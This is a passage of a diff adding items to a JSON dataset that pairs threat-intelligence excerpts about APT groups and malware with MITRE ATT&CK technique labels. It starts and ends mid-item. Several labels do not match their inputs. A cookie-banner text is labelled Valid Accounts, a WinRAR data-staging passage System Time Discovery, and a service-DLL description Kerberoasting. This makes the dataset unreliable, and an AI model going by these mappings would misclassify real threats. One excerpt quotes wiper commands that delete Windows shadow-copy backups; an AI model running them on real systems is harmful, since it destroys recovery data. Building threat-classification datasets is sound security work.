staffers\u2019 personal emails with credential phishing emails and emails containing tracking links. As part of our wider tracking of APT31 activity, we've also seen them deploy targeted malware campaigns", + "output": "- T1598: Phishing for Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PLEAD and KIVARS, for instance, share the use of RTLO techniques to disguise their installers as documents. Both also use decoy documents to make the RTLO attack more convincing. Another similarity is the use of a small loader component to load encrypted backdoors into memory", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Often service accounts are members of Domain Admins (or equivalent) or a Domain Admin was recently logged on to the computer an attacker dump credentials from. Using these credentials, an attacker can gain access to a Domain Controller and get all domain credentials, including the KRBTGT account NTLM hash which is used to create Kerberos Golden Tickets", + "output": "- T1550.003: Use Alternate Authentication Material - Pass the Ticket" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The touch utility sets the modification and access times of files. If any file does not exist, it is created with default permissions. This makes the utility useful to malware in two common scenarios: for creating an empty file at a given path that is later passed data, and/or for changing the timestamp on a file as a means of evasion, also known as \u201ctimestomping", + "output": "- T1222.002: File and Directory Permissions Modification - Linux and Mac File and Directory Permissions Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Digital delivery of over 3,000 APT1 indicators, such as domain names, and MD5 hashes of malware. Thirteen (13) X.509 encryption certificates used by APT1. A set of APT1 Indicators of Compromise (IOCs) and detailed descriptions of over 40 malware families in APT1's arsenal of digital weapons. IOCs that can be used in conjunction with\u00a0Redline\u2122, Mandiant's free host-based investigative tool, or with\u00a0Mandiant Intelligent Response\u00ae (MIR), Mandiant's commercial enterprise investigative tool", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Doki uses a previously undocumented method to contact its operator by abusing the Dogecoin cryptocurrency blockchain in a unique way in order to dynamically generate its C2 domain address. The malware has managed to stay under the radar for over six months despite samples being publicly available in VirusTotal", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Using job opportunities as template is the known method used by Lazarus to target its victims. The documents created by this actor are well designed and contain a large icon for a known company such as LockHeed Martin, BAE Systems, Boeing and Northrop Grumman in the template. In this campaign the actor has targeted people that are looking for job opportunities at Lockheed Martin. Targeting the defense industry and specifically Lockheed Martin is a known target for this actor", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production", + "output": "- T1110.003: Brute Force - Password Spraying" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Given Lazarus\u2019 use of a wide array of tools and techniques in their operations, it\u2019s reasonable to assume that the group will continue to use ever-evolving tactics in their malicious activities. Overall, an organization will need multilayered security strategies, as Lazarus and other similar groups are experienced cybercriminals who employ different strategies to get past organizational defenses", + "output": "- T1189: Drive-by Compromise" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"After the wiping procedure, the malware tries to delete the shadow copies by running the following commands: vssadmin.exe delete shadows /all /quiet **and **C:\\\\Windows\\\\system32\\\\wbem\\\\wmic.exe shadowcopy delete. Finally, the malware enters an infinite loop where it sleeps based on the is_alive_loop_interval value from the configuration file and writes \"\"Meteor is still alive\"", + "output": "- T1047: Windows Management Instrumentation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "According to the public source data, these airlines use services of the same IT service provider. It came to light that the cyberattack on this IT service provider affected 4,500,000 data subjects globally, including data related to Air India's customers. Compromise of Air India's network In mid-February 2021, Group-IB's Threat Intelligence & Attribution system detected infected devices that were part of Air India's computer network. It took the attackers 24 hours and 5 minutes to spread Cobalt Strike beacons to other devices in the airline's network. ColunmTK Timeline Connections with APT41 Group-IB researchers believe with moderate confidence that the ColunmTK campaign was carried out by APT41, a prolific Chinese-speaking nation-state threat actor. According to Group-IB's Threat Intelligence & Attribution system, the threat actor has been active since at least 2007. APT41 is known for stealing digital certificates for its cyber espionage operations. The IP address was also used to host the Cobalt Strike framework and shared an SSL certificate, b3038101fd0e8b11c519f739f12c7e9b60234d3b, with ColunmTK's IP address 185[.]118[.]166[.]66. The file is very similar to one used by APT41 in a different campaign described by FireEye researchers. The files are very similar in the way they launch a DLL file as a service and create keys in the registry", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you\u2019ve provided to them or that they\u2019ve collected from your use of their services. This is beneficial for the website, in order to make valid reports on the use of their website.Expiry: PersistentType: HTMLrc::cThis cookie is used to distinguish between humans and bots. Expiry: SessionType: HTMLKaspersky Lab2Learn more about this providertest\u00a0[x2]Used to detect if the visitor has accepted the marketing category in the cookie banner. Expiry: SessionType: HTTPMarketo2Learn more about this provider__cf_bmThis cookie is used to distinguish between humans and bots. Expiry: 2 yearsType: HTTP25 Marketing cookies are used to track visitors across websites. This can be used for marketing purposes. This is used in context with the email marketing service Marketo.com, which allows the website to target visitors via email", + "output": "- T1078: Valid Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Use automated methods, such as scripts, for collecting data (Automated Collection [T1119]) - Capture user input to obtain credentials and collect information (Input Capture [T1056]) - Collect local systems data from a compromised system (Data from Local System [T1005]) - Take screen captures of the desktop (Screen Capture [T1113]) - Collect data stored in the Windows clipboard from users (Clipboard Data [T1115", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A service DLL (loaded by svchost.exe) with a ServiceMain function typically named NetSetupServiceMain - A standard non-Service DLL loaded by rundll32.exe", + "output": "- T1558.003: Steal or Forge Kerberos Tickets - Kerberoasting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OSX/Keydnap uses a Tor2Web proxy for command and control. An installed launch agent, icloudproc, is automatically started by the OS, and listens on 127.0.0.1:9050. As noted by ESET, the main backdoor component (icloudsyncd) uses this proxy for communication purposes: \u201cKeydnap is using the onion.to Tor2Web proxy over HTTPS to report back to its C&C server", + "output": "- T1543.001: Create or Modify System Process - Launch Agent" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Communication over DNS tunnel with a hardcoded domain name and DGA-generated subdomain - C2 traffic encrypted with RSA-2048 - Custom AES-encrypted storage format used to store configuration, plugins, and harvested data - Unique version number for each sample", + "output": "- T1071.004: Application Layer Protocol - DNS\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Volexity is seeing active in-the-wild exploitation of multiple Microsoft Exchange vulnerabilities used to steal e-mail and compromise networks. In January 2021, through its Network Security Monitoring service, Volexity detected anomalous activity from two of its customers' Microsoft Exchange servers. This vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. Additionally, Volexity is providing alternative mitigations that may be used by defenders to assist in securing their Microsoft Exchange instances. This vulnerability has been confirmed to exist within the latest version of Exchange 2016 on a fully patched Windows Server 2016 server. Volexity also confirmed the vulnerability exists in Exchange 2019 but has not tested against a fully patched version, although it believes they are vulnerable. There are two methods to download e-mail with this vulnerability, depending on the way that Microsoft Exchange has been configured. In the case where a single server is being used to provide the Exchange service, Volexity believes the attacker must know the targeted user\u2019s domain security identifier (SID) in order to access their mailbox. Further other notable User-Agent entries tied to tools used for post-exploitation access to webshells. Network Indicators - Attacker IPs . Volexity has observed numerous IP addresses leveraged by the attackers to exploit the vulnerabilities described in this blog", + "output": "- T1190: Exploit Public-Facing Application" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The campaigns use a TrickBot downloader that is signed and uses an icon to pretend it is a Microsoft Word document. When the user double-clicks the file, they are presented with a decoy message box. To avoid suspicion, the decoy message suggests the user should update Microsoft Word or open the file from another computer", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As my analysis in the previous blog showed, Agent Tesla is a spyware. It monitors and collects the victim\u2019s keyboard inputs, system clipboard, screen shots of the victim\u2019s screen, as well as collects credentials of a variety of installed software. So far, through my quick analysis, this version is similar to the older one", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We\u2019ve seen the adversary staging data on a remote system or on the local system. Most of the times the data is compressed and copied at the same time. Only a handful of times the adversary copies the data first before compressing (archive collected data) and exfiltrating it. The adversary compresses and encrypts the data by using WinRAR from the command-line", + "output": "- T1124: System Time Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A macro in the Microsoft Word document contained the malicious code designed to download and execute additional malicious software on the infected system", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attackers orchestrate attacks using batch or PowerShell scripts that are executed, with the help of domain controllers, on any machine the DC can reach. The scripts retrieve the attackers\u2019 payloads using psexec or certutil", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- T1105: Ingress Tool Transfer\n- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Note that the browser itself is not hooked. Executing the browser from any other Chrome shortcut link will start and run it normally without the malicious extension, canceling out the malware\u2019s ability to control what the victim does", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Epic backdoors are commanded by a huge network of hacked servers that deliver command and control functionality", + "output": "- T1049: System Network Connections Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sodinokibi attempts to encrypt data in a user's directory and delete shadow copy backups to make data recovery more difficult. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Attackers have been making use of this exploit in the wild since at least April 17. Initial stages of the ransomware attack occurred on April 25, the day before Oracle released their update. The attackers are downloading the Sodinokibi ransomware. In this case, the attackers simply leveraged the Oracle WebLogic vulnerability, causing the affected server to download a copy of the ransomware from attacker-controlled IP addresses 188.166.74[.]218 and 45.55.211[.]79. The 188.166.74[.]218 IP address is also home to a pair of other malicious domains unrelated to this ransomware attack: arg0s-co[.]uk, which is likely a phishing domain, and projectstore[.]guru, a domain with bogus PDF-related Google search results. The other IP, 45.55.211[.]79, hosts a pair of legitimate Chilean domains, and appears to have been infected and repurposed by the attackers. The attackers were ultimately successful at encrypting a number of systems during this incident. Cisco IR Services and Talos observed the attack requests originating from 130.61.54[.]136", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attackers dropped Visual Basic and PowerShell scripts in folders that they created under the ProgramData (a hidden folder, by default). The attackers created persistence using Windows\u2019 registry, services and scheduled tasks. This persistence mechanism ensured that the loader scripts would execute either at startup or at predetermined intervals", + "output": "- T1053.005: Scheduled Task/Job - Scheduled Task\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ESET researchers have discovered several previously undocumented post-compromise tools used by the highly active Gamaredon threat group in various malicious campaigns. One tool, a VBA macro targeting Microsoft Outlook, uses the target\u2019s email account to send spearphishing emails to contacts in the victim\u2019s Microsoft Office address book. We also analyzed further Gamaredon tools that have the ability to inject malicious macros and remote templates into existing Office documents", + "output": "- T1534: Internal Spearphishing\n- T1039: Data from Network Shared Drive\n- T1204.002: User Execution - Malicious File\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We have identified several implants that leveraged PowerShell, VBS, JS, and dotnet for resilience and persistence. The final stage, however, is a dotnet application that takes several commands such as directory listing, screenshot, compress, upload, etc. It then creates random long string folder names in temp directories to host the collected files per category before compressing, encrypting and uploading to the C2 server", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Initially, cybercriminals used BlackEnergy custom plugins for launching DDoS attacks. BlackEnergy2 was eventually seen downloading more crimeware plugins \u2013 a custom spam plugin and a banking information stealer custom plugin. While another crimeware group continues to use BlackEnergy to launch DDoS attacks, the BE2 APT appears to have used this tool exclusively throughout 2014 at victim sites and included custom plugins and scripts of their own. To be clear, our name for this actor has been the BE2 APT, while it has been called \u201cSandworm Team\u201d also", + "output": "- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "dellLemb||> deletes the registry key \\Software\\Microsoft\\Internet Explorer\\notes. EXECPROGAM calls ShellExecute to run the application given in the command. NOVOLEMBRETE creates and stores data sent with the command in the registry key \\Software\\Microsoft\\Internet Explorer\\notes", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Check for Skype connectivity - Download and install Skype - Encoded communication with its C2 - Execute commands sent from the C2 server - Get multifactor authentication settings - Get the currently logged on user and OS version", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The fourth-stage wiper starts off by enumerating from A to Z, looking for fixed and remote logical drives in the system. Enumerates logical drives. For each enumeration, it performs a breadth-first search to wipe the files in the logical drive while ignoring files located in the \"\"%HOMEDRIVE%\\Windows\"\" directory\"", + "output": "- T1049: System Network Connections Discovery\n- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. 3) This file requires the target to attempt to open the .lnk file, which redirects the user to a Windows Scripting Component (.wsc) file, hosted on an adversary-controlled microblogging page. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page. 6) The Cobalt Strike Beacon implant beacons to the command-and-control (C2) IP address, which is used to remotely control the implant", + "output": "- T1036.007: Masquerading - Double File Extension" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "WMIC (wmic.exe) was used to create a remote command prompt instance (cmd.exe), which then executed the PowerShell code. The PowerShell command created two variables and attempted to download and execute the payload from one of FIN8\u2019s Command and Control (C&C) servers. This download was blocked by Bitdefender \u2013 below description is based on interpretation of variables discovered in our previous analysis of FIN8 operations", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1105: Ingress Tool Transfer\n- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After downloading the executable payload, the secondary VBScript runs the following command on the command line (T1059) to kill any existing msiexec.exe process instances and use the ping application to sleep for two seconds before using the legitimate msiexec.exe application (T1218) to launch the downloaded PlayerVLC.msi file", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Another relationship we have mentioned repeatedly is the use of the SYSCON malware family. This particular malware family was first reported in October 2017 and has been observed delivering decoy documents pertaining to North Korea. The malware is generally unsophisticated, making use of remote FTP servers for C2 communication", + "output": "- T1071.002: Application Layer Protocol - File Transfer Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It also conducts basic victim profiling activity, collecting the computer name, running process IDs, %TEMP% directory path and version of Internet Explorer. It communicates encoded system information to a single hard coded command and control (C2) server, using the system\u2019s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the 